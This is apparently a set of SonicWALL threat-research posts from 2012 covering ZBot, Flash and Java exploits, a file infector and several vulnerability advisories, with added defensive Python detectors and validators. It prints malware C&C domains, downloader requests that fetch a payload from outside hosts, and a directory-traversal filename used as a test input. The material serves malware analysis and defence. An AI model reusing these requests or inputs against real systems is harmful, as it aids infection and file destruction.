New ZBot variant discovered in the wild (Apr 26, 2012)

The SonicWALL Threats Research team discovered a new ZBot variant spreading in the wild. Through our analysis it was determined that this variant is aimed at stealing banking credentials from users in the UAE.

The Trojan makes the following DNS requests:

  • leadcloth.ru
  • datecoin.ru
  • acidblues.ru (C&C server)
  • steelray.com (C&C server)
  • danasrat.com
  • adbwer.com
  • janpollj.com
  • sahbara.com (C&C server)

The Trojan adds the following files to the filesystem:

  • %USERPROFILE%\Local Settings\Temp\tmp7c2aa4f0umcc.exe [Detected as GAV: Zbot.YW_216 (Trojan)]
  • %USERPROFILE%\Local Settings\Temp\tmpad242544.bat
  • %USERPROFILE%\Application Data\Awozaradasagq.exe [Detected as GAV: Zbot.YW_214 (Trojan)]
  • %USERPROFILE%\Application Data\Midymeeymmogu.tmp

The batch file tmpad242544.bat contains commands that disable certain Windows security features (the registry changes are listed below); it then deletes itself.

The Trojan adds the following keys to the Windows registry:

    Enable startup:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {69834A20-7B82-9FD6-35FD-B1FA2A96E05E} "%USERPROFILE%\Application Data\Awozaradasagq.exe"

    Bypass Windows Firewall:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List %windir%\explorer.exe "%windir%\explorer.exe"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List %windir%\explorer.exe "%windir%\explorer.exe"

The Trojan modifies the following registry keys:

    Disable Windows Security Center (service Start type 4 = disabled):

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc Start dword:00000004

    Disable Windows Automatic Updates:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv dword:00000004

    Relax Internet Explorer zone security (action 1406 = access data sources across domains, action 1609 = display mixed content; 0 = Enable):

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones 1609 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406 dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 dword:00000000
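The registry modifications above are the most durable host indicators in this write-up, so as an added example (not part of the original SonicWALL post) here is a Python check that parses a Windows .reg export and flags them: a GUID-named Run entry pointing into Application Data, explorer.exe on the firewall AuthorizedApplications list, wscsvc or wuauserv set to Start=4, and zone actions 1406/1609 forced to 0. The sample export is constructed; the path under Documents and Settings is an assumption about where %USERPROFILE%\Application Data resolves on an XP-style profile.

```python
"""Flag the Zbot registry changes listed above in a Windows .reg export.

Added example for this write-up, not SonicWALL's tooling. The export below is
constructed; the Run-key value name is the GUID the post reports and the
Awozaradasagq.exe path is the post's dropped file on an XP-style profile."""
import re

SERVICE_DISABLED = 4  # service Start type 4 = disabled
ZONE_ENABLE = 0       # 0 = "Enable" for IE zone actions such as 1406 and 1609

# Constructed .reg export: the post's indicators plus two benign values.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"{69834A20-7B82-9FD6-35FD-B1FA2A96E05E}"="\"C:\\Documents and Settings\\user\\Application Data\\Awozaradasagq.exe\""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\explorer.exe"="%windir%\\explorer.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1406"=dword:00000000
"1609"=dword:00000003
'''

_VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"=(.*)')

def _unescape(s):
    """Undo the .reg escaping of backslashes and quotes."""
    return s.replace("\\\\", "\\").replace('\\"', '"')

def parse_reg(text):
    """Return {key_path: {value_name: (type, data)}} for the string and dword forms."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, data = _unescape(m.group(1)), m.group(2)
        if data.startswith("dword:"):
            keys[current][name] = ("dword", int(data[6:], 16))
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            keys[current][name] = ("sz", _unescape(data[1:-1]))
    return keys

def zbot_indicators(keys):
    """Match the parsed export against the modifications described in the post."""
    findings = []
    for path, values in keys.items():
        p = path.lower()
        leaf = path.rsplit("\\", 1)[-1]
        if p.endswith("\\currentversion\\run"):
            # GUID-named autorun entry whose target lives under Application Data.
            for name, (_, data) in values.items():
                if (isinstance(data, str) and "application data" in data.lower()
                        and re.fullmatch(r"\{[0-9a-f-]{36}\}", name, re.I)):
                    findings.append(f"startup: {name} -> {data}")
        elif "\\firewallpolicy\\" in p and p.endswith("\\authorizedapplications\\list"):
            # explorer.exe allow-listed in the firewall (the process the bot injects into).
            for name in values:
                if name.lower().endswith("explorer.exe"):
                    findings.append(f"firewall allow-list: {name}")
        elif p.endswith("\\services\\wscsvc") or p.endswith("\\services\\wuauserv"):
            if values.get("Start", (None, None))[1] == SERVICE_DISABLED:
                findings.append(f"service disabled: {leaf}")
        elif "\\internet settings\\zones\\" in p:
            for action in ("1406", "1609"):
                if values.get(action) == ("dword", ZONE_ENABLE):
                    findings.append(f"zone {leaf}: action {action} set to Enable")
    return findings

if __name__ == "__main__":
    for finding in zbot_indicators(parse_reg(SAMPLE_REG)):
        print(finding)
```

Export the relevant hives from a suspect host with reg export and feed the file to parse_reg; on a live Windows system the same rules can be driven from winreg instead. Only the value forms the indicators use (strings and dwords) are parsed, which is enough for this check.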

The Trojan injects code into explorer.exe and causes it to perform the following tasks:

It downloads and runs umcc.exe [Detected as GAV: Zbot.YW_216 (Trojan)]

It posts sensitive system information to a remote C&C server and receives an encrypted Zbot configuration file in response.

The encrypted configuration file contains banking URLs, browser user-agent strings, C&C server addresses and various other instructions for the bot. Below is a sample of strings found in this file:

      "rakbankonline.ae/4rp/"
      "http://datecoin.ru/us.php"
      "http://acidblues.ru/wallst.php"
      "http://leadcloth.ru/yukon.php"
      "Welcome to HSBC"
      "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Zbot.YW_214 (Trojan)
  • GAV: Zbot.YW_216 (Trojan)

New Adobe Flash Player exploit (May 4, 2012)

SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability – CVE-2012-0779.

The exploit arrives as an e-mail attachment; if the user opens the document it attempts to exploit the newly patched Adobe Flash Player vulnerability. On successful exploitation it drops and runs additional malware on the victim machine.

The specially crafted document invokes Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea.

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the user account and author website information used to encrypt this file.

The executable embedded in the document is XOR-encoded with the single-byte key 0x85 and is a Downloader Trojan.

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan.

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3
     Host: dextsolution.com

     GET /Include/lib/ps.exe  [Detected as GAV: PcClient.NGO_3 (Trojan)]
     Host: www.multicodec.co.kr
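As an added example (not SonicWALL's tooling), the following Python carves a single-byte-XOR-encoded PE out of a carrier file, the way the 0x85-keyed downloader above would be recovered from the document. Each candidate is validated through the DOS header's e_lfanew field and the PE signature rather than by trusting a bare "MZ" match, and it goes one step beyond the post by brute-forcing the key instead of assuming 0x85. The carrier bytes and the embedded PE skeleton are constructed for the demonstration; no real document or malware is used.

```python
"""Carve a single-byte-XOR-encoded executable out of a carrier document.

Added example for this write-up, not SonicWALL's tooling. The carrier bytes and
the embedded PE skeleton below are constructed for the demonstration."""
import struct

PE_SIGNATURE = b"PE\x00\x00"

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the post's dropper used 0x85)."""
    return bytes(b ^ key for b in data)

def find_xored_pe(doc: bytes, key: int):
    """Return [(offset, decoded_bytes)] for each PE image hidden in doc under key.

    A bare search for 'MZ' ^ key is noisy, so every candidate is validated by
    decoding the 64-byte DOS header, reading e_lfanew at offset 0x3C and checking
    that the bytes it points to decode to the PE signature."""
    marker = xor_bytes(b"MZ", key)
    hits, pos = [], 0
    while True:
        pos = doc.find(marker, pos)
        if pos < 0 or pos + 0x40 > len(doc):
            break
        dos_header = xor_bytes(doc[pos:pos + 0x40], key)
        e_lfanew = struct.unpack_from("<I", dos_header, 0x3C)[0]
        sig_at = pos + e_lfanew
        if (0x40 <= e_lfanew < 0x1000 and sig_at + 4 <= len(doc)
                and xor_bytes(doc[sig_at:sig_at + 4], key) == PE_SIGNATURE):
            hits.append((pos, xor_bytes(doc[pos:], key)))
        pos += 1
    return hits

def recover_key(doc: bytes):
    """Brute-force the single-byte key instead of assuming 0x85.
    Returns (key, offset) of the first validated PE, or None."""
    for key in range(256):
        hits = find_xored_pe(doc, key)
        if hits:
            return key, hits[0][0]
    return None

# --- constructed sample data ---
def build_stub_pe() -> bytes:
    """Minimal MZ/PE skeleton: DOS header with e_lfanew = 0x80, then the PE signature and Machine = 0x014C."""
    dos = bytearray(b"MZ" + b"\x00" * 0x7E)
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + PE_SIGNATURE + struct.pack("<H", 0x014C) + b"\x00" * 8

CARRIER_PREFIX = b"<<constructed carrier document>>\n" + b"A" * 200
SAMPLE_DOC = CARRIER_PREFIX + xor_bytes(build_stub_pe(), 0x85) + b"\n<<end>>"

if __name__ == "__main__":
    key, offset = recover_key(SAMPLE_DOC)
    print(f"embedded PE: key=0x{key:02x} offset=0x{offset:x}")
```

The decoded slice runs from the MZ header to the end of the carrier because the document gives no size field; trim it to the PE's SizeOfImage or section table once the headers are parsed. The e_lfanew check also filters the false positives a 256-key brute force otherwise produces on text-heavy carriers.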

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention system provides protection against this threat via the following signatures:

  • 7772 – Adobe Flash Player Object Confusion Exploit 1
  • 7773 – Adobe Flash Player Object Confusion Exploit 2

Goblin File Infector spreading in the wild (May 11, 2012)

The SonicWALL UTM Research team discovered a new variant of the Goblin/Xpaj file infector virus spreading through malicious links in the wild. The virus was found infecting various files on the target computer and contacting a remote command and control server.

We discovered the following on analysis of the Virus:

  • It creates the following copies of itself:
    • %temp%FB.tmp [Detected as GAV: Goblin.G (Virus)]
    • %temp%FC.tmp [Detected as GAV: Goblin.G (Virus)]
    • %temp%FD.tmp [Detected as GAV: Goblin.G (Virus)]
  • It creates the following mutexes:
    • aoki
    • kcade
  • It searches through the %programfiles% and %windir% directories to identify files for infection
  • It copies each file identified for infection to %temp%.tmp, modifies the copy with malicious code and replaces the original file with the modified version
  • It checks for connectivity to the internet by querying microsoft.com
  • It posts data to a remote command and control server

  • It queries the following list of domains generated using a pre-determined algorithm:
    • aqjxite.com
    • bearwy.com
    • bfsxwjndcpj.com
    • bitubkxrybs.com
    • epjfdpstt.com
    • htwxsxd.com
    • iwlgnuz.com
    • kqjzmbgwli.com
    • lnbywuduxby.com
    • nrgrbhm.com
    • tuhxlfbqu.com
    • uoliqbysup.com
    • vlxmzlko.com
    • xnidyek.com
    • ygyame.com
    • zzayzoabsi.com
  • It has functionality to download additional malware

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Goblin.G (Virus)

Oracle GlassFish Administration Console XSS (May 4, 2012)

GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. It is the reference implementation of Java EE and as such supports Enterprise JavaBeans, JPA, JavaServer Faces, JMS, RMI, JavaServer Pages, servlets, etc. The Administration Console provided in Oracle GlassFish is a browser-based utility that features a graphical interface for administrative tasks. By default, the Administration Console listens on TCP port 4848.

Multiple cross site scripting vulnerabilities have been reported in Oracle GlassFish Administration Console. Specifically, several JavaServer Faces resources in the Administration Console do not properly sanitize incoming request parameter values before rendering page output.

An attacker could exploit these vulnerabilities by embedding malicious script code in a URL and enticing the target user to open the URL in a browser. Successful exploitation would allow the attacker to steal the target user's private information, such as the username, password and session cookie, and use those credentials to gain full access to the administrator's account and the underlying GlassFish server.

The vulnerabilities have been assigned CVE-2012-0551.

SonicWALL has released multiple IPS signatures to detect and block specific exploitation attempts targeting this vulnerability. The signatures are listed below:

  • 7762 Oracle GlassFish Administration Console XSS 1
  • 7763 Oracle GlassFish Administration Console XSS 2
  • 7764 Oracle GlassFish Administration Console XSS 3

LANDesk ThinkManagement File Deletion (April 27, 2012)

LANDesk Lenovo ThinkManagement Suite is an application for monitoring and maintaining the availability of devices on the network. It forms the foundation of other LANDesk products such as Lenovo Hardware Password Manager, Security Suite, and Antivirus. ThinkManagement Console includes a web-based console, health dashboard and monitoring, scheduled task view, remote control, software license monitoring, performance monitoring, agentless device management, and reporting.

The main component of the ThinkManagement Suite is Core Server through which all of ThinkManagement’s files and services are provided. The Core Server hosts a variety of LANDesk services, a web service and provides a connection to the management database. It exposes the VulCore.asmx web service on the target server. VulCore.asmx is responsible for processing vulnerability scan requests and uses the LDAppVulnerability application pool. This service can be accessed remotely without requiring any authentication or authorization by sending SOAP HTTP requests to the resource. The following sample HTTP request illustrates the use of a SOAP header:

 POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
 SOAPAction: "http://testing.com/RunAMTCommand"

 1111
 1
 testfile.txt

The default folder permissions allow remote invocation of VulCore.asmx without any authentication. Some of the web methods exposed by VulCore.asmx that can be named in the SOAPAction header are:

  • GetPatchesForGroup()
  • PutVulnerabilityResults()
  • SendRunStatus()
  • SetPatchInstallStatus2()
  • SetTaskLog()
  • SetTaskLogByFile()

The SetTaskLogByFile method’s prototype is shown:

public void SetTaskLogByFile(int computerIdn, int taskid, string filename)

A directory traversal vulnerability exists in the Core Server component of LANDesk Lenovo ThinkManagement Suite. It is caused by a lack of sanitization of the parameters in SOAP requests invoking the SetTaskLogByFile web method of the service. The vulnerable code does not validate the filename parameter, which is supposed to name a file under C:\Program Files\LANDesk\ManagementSuite\ldlogon; by prepending a directory traversal sequence (..\) to the filename, an attacker can make the service remove files outside that directory. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted SOAP requests to the VulCore.asmx resource with a malicious filename value for the SetTaskLogByFile method. Successful exploitation allows the attacker to delete arbitrary files on the target host, which can lead to a denial of service condition if important executables and libraries are deleted.
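As an added example, not LANDesk code, here are both sides of the exchange in Python: the SOAP request a client would send to SetTaskLogByFile, and the containment check on the filename parameter that the vulnerable service lacked. The SOAP namespace (ASSUMED_NS) and element names are assumptions, since the post gives the method prototype but not the WSDL; ldlogon is the directory the post names. ntpath is used so Windows path rules apply regardless of where the script runs.

```python
"""Request/response sketch for the SetTaskLogByFile traversal described above.

Added example for this write-up, not LANDesk code. The SOAP namespace
(ASSUMED_NS) and element names are assumptions: the post gives the method
prototype but not the service's WSDL. ldlogon is the directory the post names."""
import html
import ntpath
import xml.etree.ElementTree as ET

LDLOGON_DIR = r"C:\Program Files\LANDesk\ManagementSuite\ldlogon"
ASSUMED_NS = "http://tempuri.org/"  # assumption, see module docstring

SOAP_TEMPLATE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetTaskLogByFile xmlns="{ns}">
      <computerIdn>{computer_idn}</computerIdn>
      <taskid>{taskid}</taskid>
      <filename>{filename}</filename>
    </SetTaskLogByFile>
  </soap:Body>
</soap:Envelope>"""

class PathTraversal(ValueError):
    """Raised when a filename would resolve outside the log directory."""

def build_request(computer_idn: int, taskid: int, filename: str) -> str:
    """Client side: SOAP 1.1 body for SetTaskLogByFile(int, int, string)."""
    return SOAP_TEMPLATE.format(ns=ASSUMED_NS, computer_idn=computer_idn,
                                taskid=taskid, filename=html.escape(filename))

def resolve_task_log(filename: str, base: str = LDLOGON_DIR) -> str:
    """Server side: the containment check the vulnerable code lacked.

    ntpath gives Windows semantics everywhere: '/' is a separator, drive-qualified,
    rooted and UNC paths are refused outright, and '..' segments are collapsed
    before the result is compared with the base directory."""
    if not filename or "\x00" in filename:
        raise PathTraversal("empty or NUL-containing filename")
    if (ntpath.isabs(filename) or ntpath.splitdrive(filename)[0]
            or filename.startswith(("\\", "/"))):
        raise PathTraversal(f"absolute path not allowed: {filename!r}")
    base_norm = ntpath.normpath(base)
    resolved = ntpath.normpath(ntpath.join(base_norm, filename))
    if not resolved.lower().startswith(base_norm.lower() + "\\"):
        raise PathTraversal(f"escapes {base_norm}: {filename!r}")
    return resolved

def extract_filename(soap_xml: str) -> str:
    """Pull the filename parameter out of the request, ignoring its namespace."""
    root = ET.fromstring(soap_xml)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "filename":
            return el.text or ""
    raise ValueError("no filename element in request")

def handle_request(soap_xml: str):
    """Return ('ok', path) for a contained filename or ('rejected', reason)."""
    try:
        return "ok", resolve_task_log(extract_filename(soap_xml))
    except PathTraversal as exc:
        return "rejected", str(exc)

if __name__ == "__main__":
    for name in ("testfile.txt", r"..\..\..\..\Windows\System32\example.dll"):
        print(name, "->", handle_request(build_request(1111, 1, name)))
```

The check leaves some Windows-specific quirks to the caller: reserved device names such as CON, trailing dots and spaces, and alternate data streams (file.txt:stream) are not rejected here. The same containment test has to run before any delete or overwrite the method performs, not only before the read.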

SonicWALL has released the following IPS signatures to address this issue:

  • 7754 – Lenovo ThinkManagement Console Directory Traversal
  • 7699 – Lenovo ThinkManagement Console Arbitrary File Overwrite

The vulnerability has been assigned CVE-2012-1196 by MITRE.

IBM Tivoli ActiveX Buffer Overflow (April 20, 2012)

IBM Tivoli Provisioning Manager Express automates management of software distribution. It helps identify non-compliant users and deploy software updates to reduce user downtime and the need for support. IBM Tivoli Provisioning Manager Express runs a web service which allows clients to upload files to the server using Internet Explorer via an ActiveX control. The functionality is provided by the Isig.isigCtl.1 ActiveX control, contained in the library isig.dll. The library is installed and registered on the client system when a user requests a file upload. The ActiveX control is associated with CLSID 84B74E82-3475-420E-9949-773B4FB91771 and ProgID Isig.isigCtl. The control is scriptable and can be instantiated from a web page. Example code snippets of instantiation follow:

 <object classid="clsid:84B74E82-3475-420E-9949-773B4FB91771" id="testobject"></object>

or

 testobject = new ActiveXObject("Isig.isigCtl")

The ActiveX control exposes multiple methods, one of which is RunAndUploadFile with the following prototype:

 RunAndUploadFile (string url, string otherfields, string flags) 

The otherfields parameter is expected to contain multiple name:value pairs separated by semicolons.

A stack-based buffer overflow vulnerability exists in some versions of IBM Tivoli Provisioning Manager Express for Software Distribution. Specifically, the vulnerability is due to improper handling of the otherfields parameter passed to the RunAndUploadFile method of the Isig.isigCtl ActiveX control. The name:value pairs in the otherfields parameter are processed one by one in order to construct Content-Disposition HTTP headers. Each header value is built from one name:value pair. The vulnerable code calls a sprintf function using a format string similar to the following:

 --%sContent-Disposition: form-data; name="%s" 

The second %s is controlled by the name field of each name:value pair in the otherfields parameter; the first %s is replaced with a fixed-length string (the multipart boundary). The value field of each pair is then concatenated onto the same buffer with strcat. Because the destination buffer is a fixed-size stack buffer and neither call bounds its output, supplying a long enough string in the otherfields parameter overwrites critical data on the stack.

A remote attacker could exploit this vulnerability via a web page that passes a large crafted argument to the vulnerable ActiveX control method; the target user needs to be enticed to visit the malicious web page. Successful exploitation results in a stack buffer overflow that may divert execution in the browser process hosting the control.

SonicWALL has released an IPS signature addressing this issue. The following signature was released:

  • 7685 – IBM Tivoli Isig.isigCtl.1 ActiveX RunAndUploadFile Method Invocation

In addition to the signature released specifically for this particular vulnerability, SonicWALL has numerous existing signatures that cover known generic attack traffic that is likely to be employed in an attack targeting this flaw. These signatures are proactively preventing attacks targeting known and previously undisclosed vulnerabilities.

The vendor has released an advisory regarding this issue.
The flaw was first disclosed by ZDI in an advisory.
This vulnerability has been assigned CVE-2012-0198 by MITRE.

Oracle JRE Sandbox Restriction Bypass – Flashback Trojan (Apr 5, 2012)

Java is a programming language originally developed by James Gosling at Sun Microsystems (which has since merged into Oracle Corporation) and released in 1995 as a core component of Sun Microsystems’ Java platform. Java is a general-purpose, concurrent, class-based, object-oriented language that is specifically designed to have as few implementation dependencies as possible. Java is currently one of the most popular programming languages in use, particularly for client-server web applications, with a reported 10 million users.

Java applications are typically compiled to bytecode (class files) that run on any Java Virtual Machine (JVM) regardless of the underlying computer architecture, so a JVM plug-in can be used by browsers such as IE, Firefox, Google Chrome and Safari on Windows, Linux, Mac OS X and other operating systems. A Java applet is a Java application delivered to users in the form of Java bytecode. Applets are executed in a sandbox that prevents them from accessing local data such as the clipboard or file system.

The base Java Security sandbox is comprised of three major components: the byte code Verifier, the Class Loader, and the Security Manager. Each of these components must work properly in order for Java to perform in a secure fashion. Type safety is the most essential element of Java’s security. Type safety means that a program cannot perform an operation on an object unless that operation is valid for that object.

There is a type safety vulnerability in the Java Runtime Environment. The vulnerable version of the JVM does not properly check the object type. A malicious Java application or applet could use this flaw to cause the Java Virtual Machine to crash or bypass the Java sandbox restrictions. Successful exploitation of this vulnerability allows a Java applet to bypass JVM sandbox restrictions and achieve execution with full privileges.

Multiple malware variants making use of this vulnerability have been observed in the wild. They have been named the Flashback Trojan and are reported to have infected hundreds of thousands of Macs. The SonicWALL UTM team has researched this vulnerability and created the following IPS and GAV signatures to cover both the vulnerability and the active variants in the wild.

  • IPS: 7661 Oracle JRE AtomicReferenceArray Sandbox Restriction Bypass
  • GAV: 31909 MacOSX.Flashback.E
  • GAV: 51475 MacOSX.Flashback.A
  • GAV: 31902 MacOSX.Flashback.G
  • GAV: 51945 MacOSX.Flashback.C

This vulnerability has been assigned CVE-2012-0507.

Microsoft Security Bulletin Coverage (March 14, 2012)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of March, 2012. A list of issues reported, along with SonicWALL coverage information follows:

MS12-017 Vulnerability in DNS Server Could Allow Denial of Service (2647170)

  • CVE-2012-0006 DNS Denial of Service Vulnerability
    Malicious traffic is indistinguishable from normal DNS traffic.

MS12-018 Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2641653)

  • CVE-2012-0157 PostMessage Function Vulnerability
    This is a local vulnerability. Attacks are not detectable over the network.

MS12-019 Vulnerability in DirectWrite Could Allow Denial of Service (2665364)

  • CVE-2012-0156 DirectWrite Application Denial of Service Vulnerability
    No coverage is available.

MS12-020 Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)

  • CVE-2012-0002 Remote Desktop Protocol Vulnerability
    IPS: 4178 – Suspicious RDP Traffic 3
    IPS: 4186 – Suspicious RDP Traffic 4
  • CVE-2012-0152 Terminal Server Denial of Service Vulnerability
    This kind of attack is not detectable by SonicWALL.

MS12-021 Vulnerability in Visual Studio Could Allow Elevation of Privilege (2651019)

  • CVE-2012-0008 Visual Studio Add-In Vulnerability
    This is a local vulnerability. Attacks are not detectable over the network.

MS12-022 Vulnerability in Expression Design Could Allow Remote Code Execution (2651018)

  • CVE-2012-0016 Expression Design Insecure Library Loading Vulnerability
    IPS: 1023 – Binary Planting Attempt 1
    IPS: 5726 – Binary Planting Attempt 2
    IPS: 6847 – Binary Planting Attempt 3

IBM Tivoli Provisioning Manager Express SQL Injection (Mar 29, 2012)

IBM Tivoli Provisioning Manager Express automates the provisioning of virtual servers and software. It helps identify non-compliant users and quickly deploy critical software updates to reduce end-user downtime.

An SQL injection vulnerability exists in IBM Tivoli Provisioning Manager Express. Specifically, the vulnerability is due to a lack of sanitization of user-supplied parameters passed to the User.updateUserValue function in the register.do servlet. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the Tivoli Provisioning Manager Express server. Successful exploitation allows the attacker to gain administrator privileges.

The vulnerability has been assigned CVE-2012-0199.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 7649 IBM Tivoli Provisioning Manager Express SQL Injection

VideoLAN VLC Media Player mms Buffer Overflow (Mar 23, 2012)

VideoLAN VLC Media Player is an open source multimedia player. It can play various audio/video formats (MPEG, DivX, ogg, Wave etc.) as well as streaming protocols. It is highly portable and available for multiple platforms.

VLC Media Player can be instructed to open media resources referred to by URIs. A URI can be supplied to VLC Media Player by embedding it in a playlist file, such as an ASX (Advanced Stream Redirector) playlist. The "mms" scheme (typically written "mms://host/path") addresses the Microsoft Media Server streaming protocol used by Windows Media Services. The generic form of the mms URI parsed by VLC Media Player is as follows:

mms://[username[:password]@]hostname[:port][/path][&args…]

A stack buffer overflow vulnerability exists in VideoLAN VLC Media Player. Specifically, the vulnerability is due to improper handling of the hostname field in “mms” URIs. An attacker can exploit this vulnerability by enticing a user to open a crafted playlist file. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.
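As an added example (not VLC code), the following Python implements the mms grammar quoted above with an explicit hostname bound and runs it over the HREFs of a constructed ASX playlist, so the over-long hostname case the vulnerability hinges on is rejected before anything is copied. MAX_HOSTNAME is an assumed limit; the post does not give the size of the vulnerable buffer.

```python
"""Parse "mms" URIs of the form the post gives and bound the hostname field.

Added example for this write-up, not VLC code. The grammar is the one quoted
above; MAX_HOSTNAME is an assumed limit (the post gives no figure), and the
ASX playlist below is constructed."""
import re

MAX_HOSTNAME = 255       # assumption: a DNS-style ceiling; the point is that a bound exists
DEFAULT_MMS_PORT = 1755  # TCP port used by Microsoft Media Server

MMS_RE = re.compile(r"""
    ^mms://
    (?:(?P<username>[^:@/&]*)(?::(?P<password>[^@/&]*))?@)?   # [username[:password]@]
    (?P<hostname>[^:/&@]*)                                    # hostname
    (?::(?P<port>\d{1,5}))?                                   # [:port]
    (?P<path>/[^&]*)?                                         # [/path]
    (?P<args>&.*)?                                            # [&args...]
    $""", re.VERBOSE)

def parse_mms(uri: str) -> dict:
    """Split an mms URI into its fields, rejecting an over-long hostname up front."""
    m = MMS_RE.match(uri)
    if not m:
        raise ValueError("not an mms URI")
    parts = m.groupdict()
    host = parts["hostname"]
    if not host:
        raise ValueError("empty hostname")
    if len(host) > MAX_HOSTNAME:
        # The check whose absence lets a crafted URI overrun a fixed-size buffer.
        raise ValueError(f"hostname length {len(host)} exceeds {MAX_HOSTNAME}")
    parts["port"] = int(parts["port"]) if parts["port"] else DEFAULT_MMS_PORT
    if not 0 < parts["port"] <= 65535:
        raise ValueError("port out of range")
    parts["args"] = parts["args"][1:].split("&") if parts["args"] else []
    return parts

def check_asx(asx_text: str):
    """Pull every HREF out of an ASX playlist and report which mms URIs parse cleanly.
    ASX is case-insensitive and often not well-formed XML, so a regex is used."""
    results = []
    for uri in re.findall(r'href\s*=\s*"([^"]+)"', asx_text, re.I):
        if not uri.lower().startswith("mms://"):
            continue
        try:
            parse_mms(uri)
            results.append((uri, "ok"))
        except ValueError as exc:
            results.append((uri, f"rejected: {exc}"))
    return results

# Constructed playlist: one normal entry and one with a 300-byte hostname.
SAMPLE_ASX = f"""<ASX version="3.0">
  <ENTRY><REF HREF="mms://media.example.com/live/stream.wmv" /></ENTRY>
  <ENTRY><REF HREF="mms://{'A' * 300}/overflow" /></ENTRY>
</ASX>"""

if __name__ == "__main__":
    for uri, status in check_asx(SAMPLE_ASX):
        print(status, uri[:60])
```

The length test sits before any field is copied or handed on, which is the ordering a fixed-buffer parser in C must also follow; checking after a strcpy is what produces the overflow described above.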

The vulnerability has been assigned CVE-2012-1775.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 7622 VideoLAN VLC Media Player ASX Handling Buffer Overflow
